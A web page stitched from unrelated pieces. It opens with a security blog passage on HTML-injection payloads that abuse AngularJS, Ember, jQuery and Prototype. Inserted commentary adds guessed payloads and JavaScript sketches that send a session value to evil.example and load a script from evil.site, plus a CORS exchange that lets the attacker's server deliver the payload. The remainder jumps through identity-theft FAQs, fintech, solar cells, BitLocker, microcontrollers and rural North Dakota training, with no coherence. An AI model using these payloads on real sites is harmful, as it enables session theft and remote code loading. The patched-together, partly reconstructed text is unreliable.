I never gave them condign punishment.
Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.
Well, hackers code, too.
The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the
There are two important reasons for taking advantage of DRY in a web hack:
- Avoid incompetent blacklists (which is really a redundant term).
- Leverage code that already exists.
For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:
angular.bind(self, alert, 9)()
In Ember.js the payload might look like:
Ember.run(null, alert, 9)
The pervasive jQuery might have a string like:
And the Underscore library might be leveraged with:
These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.
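The jQuery and Underscore payloads themselves appear to be missing from the text above. By analogy with the AngularJS and Ember examples, plausible stand-ins (an assumption, though `$.globalEval` and `_.defer` are real APIs in those libraries) would be `$.globalEval("alert(9)")` and `_.defer(alert, 9)`. The sketch below models the pattern every one of these payloads shares: a generic helper that invokes an arbitrary function with arbitrary arguments. Here `run` and the stubs are hypothetical stand-ins so the sketch runs outside a browser.

```javascript
// Generic invoker modeling angular.bind(self, alert, 9)() and
// Ember.run(null, alert, 9). `run` is a stand-in, not a real library API.
function run(context, fn, ...args) {
  return fn.apply(context, args);
}

// Harmless demo: a stub standing in for window.alert.
let shown = null;
const alertStub = (msg) => { shown = msg; };
run(null, alertStub, 9);

// The "more lethal version": same invoker, different function.
const sent = [];
const exfiltrate = (data) => sent.push("//evil.example/?c=" + encodeURIComponent(data));
run(null, exfiltrate, "session=abc123");
```

Nothing here requires a flaw in the helper itself; the libraries are simply doing their jobs, which is the whole point of reusing them.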
The jQuery library provides a few ways to obtain code:
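The list itself seems to have been lost here. jQuery’s documented code-loading helpers include `$.getScript(url)` and `$.ajax({ url, dataType: "script" })`, both of which fetch a remote script and execute it. A stub (jQuery is not actually loaded in this sketch) records what such calls would do:

```javascript
// Stub mimicking the shape of jQuery's script-loading helpers. Real jQuery
// would fetch each URL and eval the response; this just records the URLs.
const fetched = [];
const $stub = {
  getScript(url) { fetched.push(url); },
  ajax(opts) { if (opts.dataType === "script") fetched.push(opts.url); },
};
$stub.getScript("//evil.site/payload.js");
$stub.ajax({ url: "//evil.site/payload2.js", dataType: "script" });
```

Note that a cross-domain script request like this is made via a script tag rather than an XHR with custom headers, which is why (unlike the Prototype example below) it does not trigger a CORS pre-flight.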
Prototype has an Ajax object. It will load and execute code from a call like:
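The call itself is missing above; based on Prototype’s documented API, it would look something like `new Ajax.Request("http://evil.site/", { method: "post", evalJS: "force" })` (an assumed reconstruction, not necessarily the author’s original). A stand-in class models what that constructor sees:

```javascript
// Stand-in for Prototype's Ajax.Request constructor; it only records the
// request instead of sending it. Option names follow Prototype's real API.
const requests = [];
class AjaxRequest {
  constructor(url, options = {}) {
    this.url = url;
    this.method = options.method || "post"; // Prototype defaults to POST
    this.evalJS = options.evalJS;
    requests.push(this);
  }
}
new AjaxRequest("http://evil.site/", { method: "post", evalJS: "force" });
```

The default POST, plus Prototype’s X-Requested-With and X-Prototype-Version headers, is what makes the browser treat this as a “non-simple” request and send the pre-flight described next.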
But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.
In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call http://web.site/xss_vuln.page.
OPTIONS http://evil.site/ HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Origin: http://web.site
Access-Control-Request-Method: POST
Access-Control-Request-Headers: x-prototype-version,x-requested-with
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-length: 0
As someone with influence over the content served by evil.site, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:
HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom headers.)
Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.
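As a sketch of what the responding script at evil.site has to produce (a JavaScript stand-in is assumed here; the author’s actual server code is not shown), the headers reduce to a small function:

```javascript
// Build the pre-flight response headers shown above. Echoing the caller's
// Origin back satisfies the browser's CORS check; Max-Age caches the result
// so subsequent requests skip the pre-flight for a while.
function preflightHeaders(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Methods": "GET, POST",
    "Access-Control-Allow-Headers": "x-json,x-prototype-version,x-requested-with",
    "Access-Control-Expose-Headers": "x-json",
    "Access-Control-Max-Age": "86400", // one day
  };
}
const h = preflightHeaders("http://web.site");
```

The Access-Control-Max-Age header is what implements the pre-flight caching mentioned above.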
Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.
Nevertheless, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves have only a 20% chance to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.
And the price for failure? Well, it turns out condign punishment has its own API.
Google relies on internally developed software.
Google primarily relies on its own internally developed software for data and network management and has a reputation for being skeptical of "not invented here" technologies, so relatively few vendors can claim it as a customer.
Google's primary programming languages include C/C++, Java and Python. Guido van Rossum, Python's creator, went to work for Google at the end of 2005. The company also has created Sawzall, a special-purpose distributed computing job preparation language.
| Function | Product | Supplier |
| --- | --- | --- |
| Distributed file system | Google File System | |
| | Global Work Queue | |
| Very large database management systems | Google proprietary, Sleepycat | |
| Server operating system | Red Hat Linux (with kernel-level modifications by Google) | Red Hat, Google |
| Web protocol accelerator | NetScaler Application Delivery | |
| Web content translation | Analyzers for Chinese, Japanese and Korean (used in combination with ...) | |
| File conversion and content extraction | | |
Frequently Asked Questions
You may have heard of identity theft, but what does this term really mean? Going far beyond credit card fraud, identity theft is a rapidly growing crime that most people will face at some point in their lives. Identity theft is officially defined as the deliberate assumption of another person's identity. It is a crime where a criminal acquires and uses the victim's personal information, such as a Social Security or driver's license number, to take out loans, obtain new credit cards, rent an apartment, purchase a car, run up debt, file for bankruptcy and other criminal activities. Identity theft can not only damage someone's creditworthiness, it can also create unknown criminal records that can result in the identity theft victim being wrongly arrested or denied employment after a routine background check.
The term "financial fraud" covers common credit card, check, and debit card fraud. When a criminal uses your credit cards or debit cards to make a purchase, he or she usually hasn't assumed your identity. Recovering from financial fraud is usually easy, since most creditors don't hold you liable for fraudulent charges. These days, financial fraud is increasingly grouped into the same category as serious identity theft. The FTC combined both types in a report announcing that there were 9.9 million cases of identity theft in 2003. These crimes alone cost businesses $27.6 billion and cost consumers $5 billion directly in losses every year.
Identity thieves use a variety of methods to gain access to your personal information:
- Steal records from their employer, bribe an employee who has access to the records, con information out of employees, or hack into the organization's computers
- "Dumpster dive" through your trash at home or work to find bills and credit statements that contain personal information
- Fraudulently obtain credit reports by either posing as a prospective landlord or misusing an employer's authorized access to credit reports
- Steal credit and debit card account numbers by using a special information storage device in a practice known as "skimming"
- Steal wallets and purses containing identification and credit and bank cards
- Steal your mail or complete a change of address to redirect your mail so that they will receive your credit card statements or tax information
- Use camera phones to take a picture of your credit or personal information while you complete a retail transaction
- Steal personal information from your home
- Scam information from you by posing as a legitimate business person or government official
Identity theft is a serious problem affecting more people every day. That’s why learning how to prevent it is so important. Knowing how to prevent identity theft makes your identity more secure. The more people who know how to prevent identity theft, the less inclined others may be to commit the crime.
Preventing identity theft starts with managing your personal information carefully and sensibly. We recommend a few simple precautions to keep your personal information safe:
- Only carry essential documents with you. Not carrying extra credit cards, your Social Security card, birth certificate or passport with you outside the house can help you prevent identity theft.
- Keep new checks out of the mail. When ordering new checks, you can prevent identity theft by picking them up at the bank instead of having them sent to your home. This makes it harder for your checks to be stolen, altered and cashed by identity thieves.
- Be careful when giving out personal information over the phone. Identity thieves may call, posing as banks or government agencies. To prevent identity theft, do not give out personal information over the phone unless you initiated the call.
- Your trash is their treasure. To prevent identity theft, shred your receipts, credit card offers, bank statements, returned checks and any other sensitive information before throwing it away.
- Make sure others are keeping you safe. Ensure that your employer, landlord and anyone else with access to your personal data keeps your records safe.
- Stay on top of your credit. Make sure your credit reports are accurate and that you sign up for a credit monitoring service, which can alert you by email to changes in your credit report – a helpful way to prevent identity theft.
- Protect your Social Security number. To prevent identity theft, make sure your bank does not print your SSN on your personal checks.
- Follow your credit card billing cycles closely. Identity thieves can start by changing your billing address. Making sure you receive your credit card bill every month is an easy way to prevent identity theft.
- Keep a list of account numbers, expiration dates and telephone numbers filed away. If your wallet is stolen, being able to quickly alert your creditors is essential to prevent identity theft.
- Create passwords or PIN numbers out of a random mix of letters and numbers. Doing so makes it harder for identity thieves to discover these codes, and makes it easier for you to prevent identity theft.
Consistently monitor both your financial and public record information and look for:
- Unfamiliar criminal records, court records, address information or bankruptcies
- Unexplained charges or withdrawals
- Failing to receive bills or other mail. This may signal an address change by the identity thief
- Being served court papers or arrest warrants for actions you did not commit
- Receiving credit cards for which you did not apply
- Being denied credit for no apparent reason
- Receiving calls or letters from debt collectors or businesses about merchandise or services you did not buy
Although any of these indications could be a result of a simple clerical error, you should not assume that there's been a mistake and do nothing. Always follow up with the business or institution to find out.
Enter your Member ID number as it appears on your health insurance card.
IDStrong’s data comes from Internet forums and websites, web pages, IRC channels, refined PII search engine queries, Twitter feeds, P2P sources, hidden and anonymous web services, malware samples, botnets, and torrent sources.
Your first IDStrong report includes data from the previous 8 years. This means that IDStrong searches the prior 8 years of records it has collected for a match to the personal information you are monitoring.
Your IDStrong service tracks Internet activity for signs that the personal information you’ve asked us to monitor is being traded and/or sold online. This alert means that our surveillance technology has discovered information on the Internet that is a match to your monitored identity elements.
Even if only some of your personal information has been detected by IDStrong, it is recommended that you contact the appropriate institution to have your account information changed, or change your account information yourself if possible - like it would be with the password to your email account. It is safe to assume that if some of your information is compromised, all of it is. You may also want to review a copy of your credit report to ensure that all of the information that appears there is familiar to you.
This activity is illegal in the United States, but other countries do not necessarily have the same laws as related to cyber crime. United States regulatory agencies have no jurisdiction to prosecute fraudsters acting on websites and chat rooms located in other countries.
IDStrong dramatically reduces your risk of identity theft by letting you know sooner if your personal information is compromised, and in turn enabling prevention or quick resolution of an identity theft incident. In addition to IDStrong, you also have identity protection insurance and recovery services to help alleviate some of the financial burden of identity theft.
Fintech Through Education
With technology permeating all industries, few of us would feel confident utilizing financial products or services that aren’t thoroughly tech-integrated, and yet the realm of fintech is still observed warily by many. Though fintech indeed incorporates many of the cutting-edge innovations which bring finance and technology together, sometimes in scenarios considered risky, or at the very least enigmatic, much of today’s fintech provides the backbone for our financial institutions and ensures we’re able to manage our business and personal finances both conveniently and securely. It’s difficult to imagine a world without internet banking, mobile banking, and even online payment systems such as PayPal, but even more innate to our current financial systems are technologies which prevent check fraud, make possible a cashless society, enable (wisely or not) the proliferation of credit cards and short term loans, and put investment opportunities directly into the hands of both small and large-scale investors. Perhaps some of the suspicions can be put down to a lack of education in the fintech environment, a condition the fintech and educational industries are working hard to rectify.
Though financial education programs are widely evident globally, many of them have retained much of their traditional compositions for decades with little thought to the technological advances impacting the industry. However, many prominent schools, colleges, and universities are moving towards curriculums with greater technological training, and finance courses are being revised to meet today’s standards. Some notable fintech courses can even be accessed online, including MIT’s Future Commerce program which deals with fintech trends, and Columbia FinTech opening up study in various fintech sectors such as digital investing, and entrepreneurship and innovation in financial services.
But such education isn’t available only for those utilizing distance learning programs; NYU Stern already offers a fintech specialization in their MBA curriculum, dealing with an extensive range of fintech from digital currencies, blockchains, and the financial services industry to risk management for fintech to robo-advisors and systematic trading. And outside of the US, the Scotland-based University of Strathclyde has just announced their own master’s program in fintech, the first such course in the UK, which will cover areas such as financial programming and analytics to improve financial security and transacting within the technological realm.
(Infographic source: PWC)
An ingenious, though little understood, financial technology, blockchain allows the distribution of digital information while securing it from replication. It was originally devised for Bitcoin, one of the most prolific digital currencies, but today its potential uses are far wider. As Don and Alex Tapscott, authors of Blockchain Revolution, put it: “The blockchain is an incorruptible digital ledger of economic transactions that can be programmed to record not just financial transactions but virtually everything of value.” Such technology is quite obviously extremely valuable, but because it’s little understood it’s no wonder many of us shy away from the concept. Happily, educational institutions are incorporating blockchain tuition into their programs, with one online university even named for the technology, Blockchain University, promising hands-on public and private training for startups and corporates alike and encouraging the development of blockchain advances. Online courses from FinTech School, Open University, and Brandeis University, to name a few, also cover aspects of blockchain, along with courses from institutions such as New York University, Duke University, and Canada’s McGill University.
Fintech education, however, is not available only to those participating in formal education; as with most technologies, those wishing to advance their understanding have a wealth of resources at their fingertips thanks to a global community of experts ready to share their own learnings and experiences. And so, whether striving for an expert grasp or merely angling for a stouter layman comprehension, there’s no longer any excuse for any of us to fear or shy away from fintech and its many potentials. It’s time we brushed up on this important technology, ensuring a safer and more beneficial financial landscape for us all.
By Jennifer Klostermann
Hoping to usher in an age of low-cost solar power, Harvard's Clean Energy Project in June plans to release a list of 20,000 organic compounds that could be used to make cheap, printable photovoltaic cells.
In a move that it hopes will help usher in an age of low-cost solar power, Harvard University's Clean Energy Project (CEP) in June plans to release a list of 20,000 organic compounds that could be used to make cheap, printable photovoltaic cells (PVC).
The list, which the CEP will make available to solar power developers, could lead to the development of very low-cost PVCs. Using the compounds, a PVC that covers 1 square meter would cost about the same as the paint needed to cover the same area, according to Harvard.
The CEP's data "will ultimately benefit mankind with cleaner energy solutions," said Alan Aspuru-Guzik, a Harvard associate professor of chemistry and chemical biology.
Today, the most popular PVCs are made of silicon and cost about $5 per wafer to produce. For a solar energy technology to be competitive, each wafer would need to cost about 50 cents, according to Aspuru-Guzik.
The compounds on the CEP's list could also improve the solar conversion rates of PVCs. Currently, the top solar conversion rate of silicon PVCs is about 12%, meaning that only 12% of the light that hits them is converted to energy.
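To put the 12% figure in concrete terms (a back-of-envelope sketch; the 1,000 W per square meter of peak sunlight is a standard assumption, not a number from the article):

```javascript
// Power delivered by a panel: area x incident sunlight x conversion rate.
function panelOutputWatts(areaM2, insolationWPerM2, efficiency) {
  return areaM2 * insolationWPerM2 * efficiency;
}

// A 1 m^2 silicon panel at ~12% efficiency in full sun yields about 120 W.
const siliconWatts = panelOutputWatts(1, 1000, 0.12);
```

Raising the conversion rate is therefore just as valuable as cutting the cost per wafer: both scale the watts delivered per dollar.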
The CEP uses IBM's World Community Grid -- which relies on the spare processing power of around 6,000 computers all over the world -- in its search for the best molecules for organic photovoltaics, as well as the best ways to assemble the molecules to build inexpensive solar cells.
Harvard has built data storage systems with a capacity of about 400TB to capture the results of the computations.
This version of this story was originally published in Computerworld's print edition. It was adapted from an article that appeared earlier on Computerworld.com.
This story, "Harvard aims to help developers make cheaper solar panels" was originally published by Computerworld.
Windows Security: Part 6
In my last blog posting I discussed the Encrypting File System (EFS) that is built into every Windows operating system since Windows 2000 and how EFS works. Although EFS is effective as a security control against data security breach-related risks, a major limitation is that it does not provide whole disk encryption, making it susceptible to certain kinds of attacks. A perpetrator who has local access to the same hard drive on which Windows resides can, for example, boot a non-Windows operating system to access EFS-encrypted files and directories or copy the entire encrypted contents of a lost or stolen PC’s hard drive to a completely different computer to view the information in clear text. Windows BitLocker encryption, which is available in Vista (see footnote below) and Windows Server 2008, addresses this limitation nicely by encrypting the entire contents of a Windows volume, thereby protecting all the data therein from a wider variety of attacks.
BitLocker’s functionality does not stop there, however. It works with version 1.2 of the Trusted Platform Module (TPM 1.2) to protect the integrity of a Windows system while that system is offline, by performing integrity checks on initial boot components. Consequently, information decryption can occur only if: 1) critical system components have ostensibly not been tampered with, and 2) the encrypted drive has stayed within the original system. If BitLocker detects tampering with any system files or information, the system halts the startup process.
Predictably, how BitLocker actually works is a little more complicated. For BitLocker to function to its fullest potential, the following requirements must be met:
- System must have TPM version 1.2. System integrity checks can nevertheless be performed if this requirement is not met, but the administrator must save a special startup key on removable media, e.g., a flash drive.
- System with a TPM must also have a BIOS that is Trusted Computing Group (TCG)-compliant. The BIOS sets up a chain of trust during startup prior to the operating system boot process; it must support the TCG-specified Static Root of Trust Measurement. If a system does not have a TPM, a TCG-compliant BIOS is unnecessary.
- System BIOS must support the USB mass storage device class. This includes the ability to read small files stored on a USB flash drive before the operating system boots, regardless of whether the system does or does not have a TPM.
- Hard disk must have a minimum of two partitions, with the system (boot) partition containing both the operating system and the files needed to load the operating system after the BIOS has initialized the system hardware. BitLocker must not be enabled on this partition, nor can this partition be encrypted through any other means.
- File system must be NTFS.
- System drive should have a minimum of 1.5 GB.
Like anything else, BitLocker is not perfect. One widely advertised attack against it is the “cold boot” attack, in which the temperature of the system’s DRAM is lowered so that the encryption keys it holds persist long enough to be read after a reboot. In reality, however, what this kind of attack shows is that if someone has physical access to a machine, that person can ultimately defeat any security control.
Although EFS is not bad, BitLocker is much better for several reasons. First, it keeps users out of the loop altogether. With BitLocker the decision to encrypt files is made by a system administrator, not any user. Second, BitLocker simplifies encryption and key management. There are no individual keys to store and manage. Furthermore, as stated earlier, whole disk encryption greatly reduces the risk that an unauthorized person will be able to decrypt the contents of a BitLocker-encrypted hard drive. And finally, BitLocker even protects EFS encryption keys.
Footnote – Vista BitLocker is actually available only on the Enterprise and Ultimate editions of Vista.
If you want a wearable Internet of Things, the electronics have to be as small and as energy efficient as possible. That's why a new microcontroller by Freescale Semiconductor is notable.
The company has produced the Kinetis KLO3 MCU, a 32-bit ARM system that is 15% smaller than its previous iteration but with a 10% power improvement.
This microcontroller from Freescale Semiconductor is smaller than the dimple on a golf ball. (Photo: Freescale Semiconductor)
Internet of Things is a buzzword for the trend toward network-connected sensors incorporated into devices that in the past were standalone appliances. These devices use sensors to capture things like temperatures in thermostats, pressure, accelerometers, gyroscopes and other types of MEMS sensors. A microcontroller unit gives intelligence and limited computational capability to these devices, but is not a general purpose processor. One of the roles of the microcontroller is to connect the data with more sophisticated computational power.
The Kinetis KLO3 runs a lightweight embedded operating system to connect the data to other devices, such as an app that uses a more general purpose processor.
Kathleen Jachimiak, product launch manager at Freescale, said the new microcontroller will "enable further miniaturization" in connected devices. This MCU is capable of having up to 32 KB of flash memory and 2 KB of RAM.
Consumers want devices that are light, small and smart. They also want to be able to store their information and send it to an application that's either on a phone or a PC, Jachimiak said.
This microcontroller, at 1.6 x 2.0 mm, is smaller than the dimple on a golf ball, and uses a relatively new process in its manufacturing, called wafer level chip scale packaging. The process involves building the integrated package while the die is still part of a wafer. It's a more efficient process and produces the smallest possible package, for a given die size.
This article, Shrinking microcontrollers means smaller wearable computers , was originally published at Computerworld.com.
Patrick Thibodeau covers cloud computing and enterprise applications, outsourcing, government IT policies, data centers and IT workforce issues for Computerworld. Follow Patrick on Twitter at @DCgov or subscribe to Patrick's RSS feed.
This story, "Shrinking Microcontrollers Means Smaller Wearable Computers" was originally published by Computerworld.
For some states, economic development is more than bringing jobs to a region to lower the unemployment rate: It's about saving small towns from extinction. North Dakota is one of those states, and economic-development officials hope to save as many rural towns as possible from dying a slow death.
For many of the state's rural residents, those small towns offer the only avenue to basic services, such as doctors, other health-care providers and even grocery stores.
"When people start leaving, there's no one to provide services," said Tara Holt, director of Women and Technology, a unit of the Bismarck-based Center for Technology and Business.
She cited Rugby, N.D., as a prime example of this scenario.
"This is a community that sees that they would be faced with extinction if they didn't get out and create some new opportunities for the people who live in the community," Holt said. "In Rugby, the hospital has led the way. The administration has taken an old nurses' dorm and created a technology lab in that dorm."
Holt said the hospital has long had a problem in getting licensed practical nurses (LPNs), so hospital brass created a system to work with a community college to educate nursing students from smaller communities so they can become LPNs.
"The skill of a 12-hour class translates into so much more," Holt said. "Now, you've got a vibrant community. You've got a hospital that's going to have employees. They've taken this whole thing out into the community; this community runs seven different classes per week, with probably 12 people in each class. They've changed their mentality, and technology is the basis of so many thing that the community relies on to stay alive."
Starting at Square One
Holt has organized a series of technology training courses for residents of rural towns for the last two years, and the training classes have reached approximately 7,000 people.
"I traveled into rural areas and went into businesses, and one of the things that I saw was that a lot of them had computers," she said. "But, if you started talking to them about what they used them for, guess what -- they had computes, but they didn't use them. They had no one to ask."
Getting such training to a rural population is difficult, Holt said, given that many of the people who need the training live three or four hours from the nearest city. Another problem was actually convincing the people that technology can be beneficial.
"We needed to change the mentality of everyone in the rural areas because there was a fear of technology, instead of embracing and using [it] to make things better," she said. "They really had a tendency to either pooh-pooh it or to damn it, because they didn't know about it."
The center's community computer training classes offer rural residents four courses: the introductory course; the intermediate course; the "Power-Up with Projects" course; and a "Build the Future Web Design" course. Trainers work with all ages of people, from children all the way to senior citizens.
"We wrote our own curriculum," she said. "We boiled it down to the simplest elements - here's what you have to know to run a computer - and left out all the extra things you don't need to know. We printed our books in a 14-point font, which may be a small thing, but it's turned into such a friendly thing, especially for senior citizens when they're looking back and forth between a book and a screen."
Once the curriculum was developed, Holt and her staff had to look for a place to test the effectiveness of the training programs.
"We found a community, Hettinger, in southwestern North Dakota, down in a corner where they're just desperate for anything," she said. "I thought we'd have about 20 students, and we had about 250 in the first few months. The community has a population of 1,200."
The sheer demand forced Holt to rethink her strategy of how to best reach rural residents, so she devised a plan where her staff trained key people to be able to go out and train other people. Finding the right people to take on the role of trainer was critical to the success of the community training classes.
"Every community has a few people who have decent computer skills, but, beyond that, are also good communicators and are respected in their community," she said. "In a rural area, if your peers don't respect you and you're teaching a class, they won't come. Finding those people was key to what we're doing."
Maintaining the Momentum
The need to press on in training efforts across the state is imperative, said Orlin Hanson, economic development director of the Renville County Job Development Authority.
"This whole northwestern part of North Dakota is in dire shape," Hanson said. "The two counties right to the West of me - Burke County and Divide County - lost 25 percent of their population over the last 10 years. A good share of that is young couples leaving. My county lost 17 percent over the same course of time."
The first step to economic vitality in rural areas is developing a skilled workforce, he said, and luring companies to the state depends on having such a workforce ready.
"We're trying to promote economic development, and the best way we're going to do that is with private enterprise -- somebody who has a chance to make a profit," he said. "Profit is the greatest motivating factor that mankind has ever come up with. That's what we're trying to do out here -- getting a trainable workforce so those people who see they can make a profit, they'll come in."
Hanson, who lost his ranch in 1996, started as the economic development director approximately two years ago.
"I told the board, 'If I take it, my first objective is getting everybody, and I mean everybody, on computers and the Internet,'" he said. "We started running computer classes that winter in three little towns, and we had 189 people take the introductory and intermediate computer courses."
Holt's group of instructors trained the instructors who ultimately taught the 189 people who took the classes.
"We might be rural, but we're not isolated anymore," Hanson said.
Shane Peterson, News Editor | <urn:uuid:320ec00a-1764-455d-9d67-aa82f6339d81> | CC-MAIN-2017-09 | http://www.govtech.com/magazines/gt/Tug-of-War.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00369-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.983351 | 1,308 | 2.734375 | 3 |